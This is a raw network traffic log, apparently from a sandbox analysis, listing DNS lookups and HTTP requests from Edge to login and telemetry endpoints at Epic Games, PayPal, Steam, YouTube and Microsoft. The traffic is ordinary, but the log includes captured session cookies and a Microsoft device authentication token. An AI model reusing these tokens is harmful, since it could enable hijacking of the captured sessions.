etag: W/"90ec08827401d1ab5b22661121b1945b"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 bec13cdbd4d650c71ed35e5a7991d3ca.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: qqWTJv9-tNKpUU8vOD9Qcgdevv25amo_YeAqUZbfm1jml5n09mp9AQ==
age: 1192277
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/js/11.9fb92053.chunk.js

MicrosoftEdgeCP.exe

Remote address:

18.239.36.22:443

Request

GET /account-portal/static/static/js/11.9fb92053.chunk.js HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: application/javascript
date: Mon, 16 Oct 2023 11:37:36 GMT
last-modified: Mon, 16 Oct 2023 11:32:09 GMT
etag: W/"d94e9a9ee0df22e54714385f84969620"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 bec13cdbd4d650c71ed35e5a7991d3ca.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: JzIAOTWiIaPbeZ5I5qZInKvXsn90neCHScPE5W5N4osDQFjSa4HkiQ==
age: 1192277
DNS

tracking.epicgames.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

tracking.epicgames.com

IN A

Response

tracking.epicgames.com

IN CNAME

tracking-website-prod-674464163.us-east-1.elb.amazonaws.com

tracking-website-prod-674464163.us-east-1.elb.amazonaws.com

IN A

52.20.186.151

tracking-website-prod-674464163.us-east-1.elb.amazonaws.com

IN A

54.166.243.177

tracking-website-prod-674464163.us-east-1.elb.amazonaws.com

IN A

3.93.123.75
GET

https://tracking.epicgames.com/tracking.js

MicrosoftEdgeCP.exe

Remote address:

52.20.186.151:443

Request

GET /tracking.js HTTP/2.0
host: tracking.epicgames.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:32 GMT
content-type: application/javascript; charset=utf-8
vary: Accept-Encoding
x-dns-prefetch-control: off
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000
x-download-options: noopen
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-epic-correlation-id: 574dd010-76f0-11ee-a0a2-4dfef0de10c4
set-cookie: _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; Domain=.epicgames.com; Path=/; Secure; SameSite=None
etag: W/"ffa0-XzfPTEog1KORjM8h78ATi/tPofw"
content-encoding: gzip
GET

https://tracking.epicgames.com/track.png?referringUrl=none&location=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin&now=1698648522112&eventType=pageView

MicrosoftEdgeCP.exe

Remote address:

52.20.186.151:443

Request

GET /track.png?referringUrl=none&location=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin&now=1698648522112&eventType=pageView HTTP/2.0
host: tracking.epicgames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824

Response

HTTP/2.0 204

date: Mon, 30 Oct 2023 06:48:43 GMT
x-dns-prefetch-control: off
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000
x-download-options: noopen
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-epic-correlation-id: 5e124bb0-76f0-11ee-a4ca-3f8140ad015e
pragma: no-cache
expires: 0
cache-control: no-cache, no-store, must-revalidate
etag: W/"a-bAsFyilMr4Ra1hIU5PyoyFRunpI"
GET

https://tracking.epicgames.com/track.png?interactionType=duration&eventCategory=login&eventAction=login&provider=undefined&flow=login&clientId=null&displayMode=web&eventType=interaction&application=EPICEVENTTRACKING&appEnv=prod&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063&eventDate=2023-10-30T06%3A48%3A48.520Z&strategy=isolatedTestFlagEnabled%3Dfalse&trackingUUID=dddac527ae1a44b2ac7563ff46bce1ba&eventLabel=navigator-%3E%2Flogin&eventValue=11223&referringUrl=none&location=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin&now=1698648528521

MicrosoftEdgeCP.exe

Remote address:

52.20.186.151:443

Request

GET /track.png?interactionType=duration&eventCategory=login&eventAction=login&provider=undefined&flow=login&clientId=null&displayMode=web&eventType=interaction&application=EPICEVENTTRACKING&appEnv=prod&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063&eventDate=2023-10-30T06%3A48%3A48.520Z&strategy=isolatedTestFlagEnabled%3Dfalse&trackingUUID=dddac527ae1a44b2ac7563ff46bce1ba&eventLabel=navigator-%3E%2Flogin&eventValue=11223&referringUrl=none&location=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin&now=1698648528521 HTTP/2.0
host: tracking.epicgames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824

Response

HTTP/2.0 204

date: Mon, 30 Oct 2023 06:48:51 GMT
x-dns-prefetch-control: off
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000
x-download-options: noopen
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-epic-correlation-id: 62635650-76f0-11ee-a5d6-17edc1f95647
pragma: no-cache
expires: 0
cache-control: no-cache, no-store, must-revalidate
etag: W/"a-bAsFyilMr4Ra1hIU5PyoyFRunpI"
DNS

0.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.159.190.20.in-addr.arpa

IN PTR

Response
DNS

22.36.239.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.36.239.18.in-addr.arpa

IN PTR

Response

22.36.239.18.in-addr.arpa

IN PTR

server-18-239-36-22ams58r cloudfrontnet
DNS

watson.telemetry.microsoft.com

Remote address:

8.8.8.8:53

Request

watson.telemetry.microsoft.com

IN A

Response

watson.telemetry.microsoft.com

IN CNAME

blobcollector.events.data.trafficmanager.net

blobcollector.events.data.trafficmanager.net

IN CNAME

onedsblobprdwus17.westus.cloudapp.azure.com

onedsblobprdwus17.westus.cloudapp.azure.com

IN A

20.189.173.22
DNS

www.youtube.com

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

142.251.36.14

youtube-ui.l.google.com

IN A

142.251.39.110

youtube-ui.l.google.com

IN A

172.217.168.206

youtube-ui.l.google.com

IN A

172.217.23.206

youtube-ui.l.google.com

IN A

216.58.208.110

youtube-ui.l.google.com

IN A

216.58.214.14

youtube-ui.l.google.com

IN A

142.250.179.142

youtube-ui.l.google.com

IN A

142.251.36.46

youtube-ui.l.google.com

IN A

142.250.179.174

youtube-ui.l.google.com

IN A

142.250.179.206
POST

https://watson.telemetry.microsoft.com/Telemetry.Request

Remote address:

20.189.173.22:443

Request

POST /Telemetry.Request HTTP/1.1
Connection: Keep-Alive
User-Agent: MSDW
MSA_DeviceTicket: t=EwCwAlN5BAAUu1V9OkIAK55tj6h8OjaXgvkszYkAAWb2ZUxfa7nmWn0zq93Z76IzE8BKpxQYdULCATmO92B7s4awi8j8/dUbaDcT3yM2WM2jCBarSn4rlrHt6s68JEGfkKSWD++rPQHquhvRDZTfY5gvG9nBE7WMvToLwofdaaP6A/HK6HYMPEC9X7oMQ8r/5wIeiBH1PHIZlWvfvTd0uZnpOzhVo7zLV6lAhIyAA00GbN5MveX409BZYSI09mqE9ZWeZahZYx4y7JqPugjGjZ7AK/LTV1pi8N3uIsSKq/2WmBTzuYZGckK+j0laJeYDHSuymZfOLA2p3dZO5kiXwGhvdMFkQHt4PlSXnqARIx47mdHaLsffB4jWFiZHv00DZgAACJVmgqFob+nHgAGATnY33tPEbJIBJ/pF8z98it+Gn9A/o4edS+OWpEPgXri7DqjB1IheRfKbQdwJP5VGs4lVyJvaTKVdIf43Zopiw+fMqYJHHUWa2goOmcVhWVVMo4Etw3AlixDAGCRpCvkGJSNjK7Wze5GG543E9bNxEfq/Z28GtcRJGjngZ91PZ4Um5deeVPte7mDVGHDfDXb8i08Br1dhT3EXEfZ80yKRSlojOmtPRqD7HfuHBjCdu5nasE+blRaFqu5VqxnHfZAWZxm+qRp0ARuZV4WJm7vxHQNZrnp07YBFVZr6MNxW2A2SBORZExcR320vqh+qQnHjOsdwC2f7MxTR36A/69m8mjXkMUverv8274w58bM1Kh6SW4ii2H8qIsL3FnYULbfibFnh+i4A5f1oLBCLil50yHRycznYX4gAjZ5w+cmwGRd4NJN82FzxRvk436epJuFk+w7L6WzEmf/udq1rRE8cu167L+2nPyf1EPhXdPCXEg8LCeJH6ovy4wdMWITk2fm2AQ==&p=
AAD_TenantId: (null)
Content-Length: 4624
Host: watson.telemetry.microsoft.com

Response

HTTP/1.1 200 200 OK

Content-Length: 741
Content-Type: text/xml
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
Date: Mon, 30 Oct 2023 06:48:33 GMT
DNS

14.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.36.251.142.in-addr.arpa

IN PTR

Response

14.36.251.142.in-addr.arpa

IN PTR

ams15s44-in-f141e100net
DNS

151.186.20.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

151.186.20.52.in-addr.arpa

IN PTR

Response

151.186.20.52.in-addr.arpa

IN PTR

ec2-52-20-186-151 compute-1 amazonawscom
DNS

www.recaptcha.net

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.recaptcha.net

IN A

Response

www.recaptcha.net

IN A

142.250.179.163
GET

https://www.recaptcha.net/recaptcha/enterprise.js?render=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_&hl=en

MicrosoftEdgeCP.exe

Remote address:

142.250.179.163:443

Request

GET /recaptcha/enterprise.js?render=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_&hl=en HTTP/2.0
host: www.recaptcha.net
accept: application/javascript, */*;q=0.8
referer: https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/recaptcha/recaptcha_v3.html?siteKey=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_&locale.x=en_US&country.x=US&checkConnectionTimeout=5000&source=recaptchaV3Eval&timestamp=1698648501553&%7D&action=default
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: text/javascript; charset=UTF-8
expires: Mon, 30 Oct 2023 06:48:33 GMT
date: Mon, 30 Oct 2023 06:48:33 GMT
cache-control: private, max-age=300
cross-origin-resource-policy: cross-origin
content-encoding: gzip
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
content-security-policy: frame-ancestors 'self'
x-xss-protection: 1; mode=block
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://www.recaptcha.net/recaptcha/enterprise/anchor?ar=1&k=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_&co=aHR0cHM6Ly93d3cucGF5cGFsb2JqZWN0cy5jb206NDQz&hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2&size=invisible&cb=x7dghg3x5uzx

MicrosoftEdgeCP.exe

Remote address:

142.250.179.163:443

Request

GET /recaptcha/enterprise/anchor?ar=1&k=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_&co=aHR0cHM6Ly93d3cucGF5cGFsb2JqZWN0cy5jb206NDQz&hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2&size=invisible&cb=x7dghg3x5uzx HTTP/2.0
host: www.recaptcha.net
accept: text/html, application/xhtml+xml, image/jxr, */*
referer: https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/recaptcha/recaptcha_v3.html?siteKey=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_&locale.x=en_US&country.x=US&checkConnectionTimeout=5000&source=recaptchaV3Eval&timestamp=1698648501553&%7D&action=default
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
cross-origin-resource-policy: cross-origin
cross-origin-embedder-policy: require-corp
report-to: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 30 Oct 2023 06:48:43 GMT
content-security-policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://www.recaptcha.net/recaptcha/enterprise/webworker.js?hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2

MicrosoftEdgeCP.exe

Remote address:

142.250.179.163:443

Request

GET /recaptcha/enterprise/webworker.js?hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2 HTTP/2.0
host: www.recaptcha.net
accept: application/javascript, */*;q=0.8
referer: https://www.recaptcha.net/recaptcha/enterprise/anchor?ar=1&k=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_&co=aHR0cHM6Ly93d3cucGF5cGFsb2JqZWN0cy5jb206NDQz&hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2&size=invisible&cb=x7dghg3x5uzx
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: text/javascript; charset=UTF-8
expires: Mon, 30 Oct 2023 06:49:08 GMT
date: Mon, 30 Oct 2023 06:49:08 GMT
cache-control: private, max-age=300
cross-origin-embedder-policy: require-corp
report-to: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
content-encoding: gzip
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
content-security-policy: frame-ancestors 'self'
x-xss-protection: 1; mode=block
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://www.recaptcha.net/recaptcha/enterprise/anchor?ar=1&k=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_&co=aHR0cHM6Ly93d3cucGF5cGFsb2JqZWN0cy5jb206NDQz&hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2&size=invisible&cb=liyczurj9wbw

MicrosoftEdgeCP.exe

Remote address:

142.250.179.163:443

Request

GET /recaptcha/enterprise/anchor?ar=1&k=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_&co=aHR0cHM6Ly93d3cucGF5cGFsb2JqZWN0cy5jb206NDQz&hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2&size=invisible&cb=liyczurj9wbw HTTP/2.0
host: www.recaptcha.net
accept: text/html, application/xhtml+xml, image/jxr, */*
referer: https://www.paypalobjects.com/web/res/4d6/ac0e66a10e9f413ad6eea1e089fc1/recaptcha/recaptcha_v3.html?siteKey=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_&locale.x=en_US&country.x=US&checkConnectionTimeout=5000&source=recaptchaV3Eval&timestamp=1698648501553&%7D&action=default
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
cross-origin-resource-policy: cross-origin
cross-origin-embedder-policy: require-corp
report-to: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 30 Oct 2023 06:49:08 GMT
content-security-policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
POST

https://www.recaptcha.net/recaptcha/enterprise/reload?k=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_

MicrosoftEdgeCP.exe

Remote address:

142.250.179.163:443

Request

POST /recaptcha/enterprise/reload?k=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_ HTTP/2.0
host: www.recaptcha.net
accept: */*
origin: https://www.recaptcha.net
referer: https://www.recaptcha.net/recaptcha/enterprise/anchor?ar=1&k=6LcIqhQnAAAAALaFG_OYvAiN0AADoWg-nuPKcDS_&co=aHR0cHM6Ly93d3cucGF5cGFsb2JqZWN0cy5jb206NDQz&hl=en&v=vm_YDiq1BiI3a8zfbIPZjtF2&size=invisible&cb=liyczurj9wbw
accept-language: en-US
content-type: application/x-protobuffer
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-length: 6174
cache-control: no-cache

Response

HTTP/2.0 200

content-type: application/json; charset=utf-8
content-encoding: gzip
date: Mon, 30 Oct 2023 06:49:32 GMT
expires: Mon, 30 Oct 2023 06:49:32 GMT
cache-control: private, max-age=0
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
content-security-policy: frame-ancestors 'self'
x-xss-protection: 1; mode=block
server: GSE
set-cookie: _GRECAPTCHA=09ALsHHK3K4rMelB8Q8bDSqs_JYTO7BEGtjyhoZsSliytRAzxNhGb4GVKd_zuTVY79noz-BM9r4FUBlOFoVCS7Xrw;Path=/recaptcha;Expires=Sat, 27-Apr-2024 06:49:32 GMT;Secure;HttpOnly;Priority=HIGH
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

i.ytimg.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

i.ytimg.com

IN A

Response

i.ytimg.com

IN A

142.250.179.182

i.ytimg.com

IN A

142.250.179.214

i.ytimg.com

IN A

142.251.36.22

i.ytimg.com

IN A

142.251.39.118

i.ytimg.com

IN A

172.217.168.214

i.ytimg.com

IN A

172.217.23.214

i.ytimg.com

IN A

216.58.208.118

i.ytimg.com

IN A

142.250.179.150

i.ytimg.com

IN A

142.251.36.54

i.ytimg.com

IN A

172.217.168.246
GET

https://i.ytimg.com/generate_204

MicrosoftEdgeCP.exe

Remote address:

142.250.179.182:443

Request

GET /generate_204 HTTP/2.0
host: i.ytimg.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.youtube.com/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 204

content-length: 0
cross-origin-resource-policy: cross-origin
date: Mon, 30 Oct 2023 06:48:34 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

22.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.173.189.20.in-addr.arpa

IN PTR

Response
DNS

163.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

163.179.250.142.in-addr.arpa

IN PTR

Response

163.179.250.142.in-addr.arpa

IN PTR

ams15s41-in-f31e100net
DNS

182.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

182.179.250.142.in-addr.arpa

IN PTR

Response

182.179.250.142.in-addr.arpa

IN PTR

ams15s41-in-f221e100net
GET

https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico

MicrosoftEdge.exe

Remote address:

192.229.221.25:443

Request

GET /en_US/i/icon/pp_favicon_x.ico HTTP/2.0
host: www.paypalobjects.com
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
dnt: 1
DNS

195.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.179.250.142.in-addr.arpa

IN PTR

Response

195.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f31e100net
DNS

106.208.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

106.208.58.216.in-addr.arpa

IN PTR

Response

106.208.58.216.in-addr.arpa

IN PTR

sof01s11-in-f1061e100net

106.208.58.216.in-addr.arpa

IN PTR

ams17s08-in-f10�J
DNS

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

IN A

Response

zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com

IN CNAME

siteintercept.qprod2.net

siteintercept.qprod2.net

IN CNAME

prodlb.siteintercept.qualtrics.com.cdn.cloudflare.net

prodlb.siteintercept.qualtrics.com.cdn.cloudflare.net

IN A

104.17.209.240

prodlb.siteintercept.qualtrics.com.cdn.cloudflare.net

IN A

104.17.208.240
POST

https://zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com/WRSiteInterceptEngine/Targeting.php?Q_ZoneID=ZN_1yNnlIufRcT75CB&Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs

MicrosoftEdgeCP.exe

Remote address:

104.17.209.240:443

Request

POST /WRSiteInterceptEngine/Targeting.php?Q_ZoneID=ZN_1yNnlIufRcT75CB&Q_CLIENTVERSION=1.64.1&Q_CLIENTTYPE=hostedjs HTTP/2.0
host: zn1ynnliufrct75cb-paypalxm.siteintercept.qualtrics.com
accept: */*
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: application/x-www-form-urlencoded
accept-encoding: gzip, deflate, br
content-length: 51
cache-control: no-cache

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:43 GMT
content-type: application/json
cf-ray: 81e1b6d90f56666e-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://www.paypal.com
cache-control: no-store, no-cache, must-revalidate, max-age=0
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-credentials: true
content-security-policy-report-only: frame-ancestors 'self' *.qualtrics.com *.my.salesforce.com *.visualforce.com *.visual.force.com *.lightning.force.com; report-uri https://sjc1.qualtrics.com/csp-report
permissions-policy: camera=(), geolocation=(), microphone=()
referrer-policy: strict-origin-when-cross-origin
timing-allow-origin: *
trace-id: a0eb5477e13a669e
x-content-type-options: nosniff
vary: Accept-Encoding
server: cloudflare
content-encoding: br
DNS

steamcommunity.com

MicrosoftEdge.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.207.106.113
GET

https://steamcommunity.com/favicon.ico

MicrosoftEdge.exe

Remote address:

23.207.106.113:443

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Host: steamcommunity.com
DNT: 1
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: image/x-icon
Cache-Control: public,max-age=86400
Expires: Fri, 02 Jun 2023 17:35:14 GMT
Last-Modified: Tue, 18 Sep 2018 23:32:59 GMT
Content-Length: 38554
Date: Mon, 30 Oct 2023 06:48:43 GMT
Connection: keep-alive
DNS

240.209.17.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.209.17.104.in-addr.arpa

IN PTR

Response
DNS

240.209.17.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.209.17.104.in-addr.arpa

IN PTR

Response
DNS

store.steampowered.com

MicrosoftEdge.exe

Remote address:

8.8.8.8:53

Request

store.steampowered.com

IN A

Response

store.steampowered.com

IN A

104.85.0.101
GET

https://store.steampowered.com/favicon.ico

MicrosoftEdge.exe

Remote address:

104.85.0.101:443

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Host: store.steampowered.com
DNT: 1
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: image/x-icon
Cache-Control: public,max-age=86400
Expires: Thu, 29 Jun 2023 04:26:28 GMT
Last-Modified: Wed, 28 Jun 2023 04:07:18 GMT
Strict-Transport-Security: max-age=300
Content-Length: 38554
Date: Mon, 30 Oct 2023 06:48:45 GMT
Connection: keep-alive
GET

https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico

MicrosoftEdge.exe

Remote address:

163.70.151.21:443

Request

GET /rsrc.php/yv/r/B8BxsscfVBr.ico HTTP/2.0
host: static.xx.fbcdn.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
dnt: 1

Response

HTTP/2.0 200

content-type: image/x-icon
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
content-md5: 5Qjso+r8wfwtfxm6+yngaw==
expires: Thu, 24 Oct 2024 18:51:26 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
x-fb-debug: eP5ogs2WNNCpES6Vp06vt9lna/oNcImm9P8a8DlAdmBSHoJ1d9GFgBflu+0x+tuo0BfKIM05Ru3uAjllkboDHg==
content-length: 1150
date: Mon, 30 Oct 2023 06:48:47 GMT
alt-svc: h3=":443"; ma=86400
GET

https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en

MicrosoftEdgeCP.exe

Remote address:

142.250.179.141:443

Request

GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
referer: https://www.youtube.com/
accept-language: en-US
